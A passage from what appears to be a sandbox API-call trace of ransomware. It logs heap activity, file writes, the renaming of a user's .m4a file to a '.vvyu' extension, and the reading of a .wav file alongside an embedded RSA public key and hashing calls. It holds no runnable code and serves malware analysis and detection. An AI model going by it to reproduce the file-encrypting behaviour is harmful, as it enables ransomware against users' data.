[0197.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0197.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4c8 [0197.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.996] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a528 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a540 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4e0 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4b0 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0197.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0198.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0198.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d508 | out: hHeap=0x6a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.006] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x74f8, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x74f8, lpOverlapped=0x0) returned 1 [0198.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0198.007] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x74fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.007] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.008] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.009] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.009] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.009] CloseHandle (hObject=0x52c) returned 1 [0198.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d31688 [0198.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0198.011] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\A_919xC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\a_919xc.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\A_919xC.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\a_919xc.m4a.vvyu")) returned 1 [0198.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.013] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.016] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746f60, ftCreationTime.dwHighDateTime=0x1d89c8f, ftLastAccessTime.dwLowDateTime=0xdfa69570, ftLastAccessTime.dwHighDateTime=0x1d89e23, ftLastWriteTime.dwLowDateTime=0xdfa69570, ftLastWriteTime.dwHighDateTime=0x1d89e23, nFileSizeHigh=0x0, nFileSizeLow=0x6f53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ia4pAHu.wav", cAlternateFileName="")) returned 1 [0198.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0198.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11e) returned 0x2c70bc8 [0198.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0198.016] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ia4pAHu.wav") returned=".wav" [0198.016] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ia4pAHu.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\ia4pahu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.017] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=28499) returned 1 [0198.017] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.019] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x6f2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.019] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.021] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.022] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x6f53, lpOverlapped=0x0) returned 1 [0198.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.022] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.023] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0198.023] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.023] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.023] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.024] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.024] GetLastError () returned 0x0 [0198.024] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.024] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0198.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.024] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.024] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.024] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6f50) returned 0x2d4f778 [0198.025] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d508 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d550 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.025] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0198.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4e0 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a4c8 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0198.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 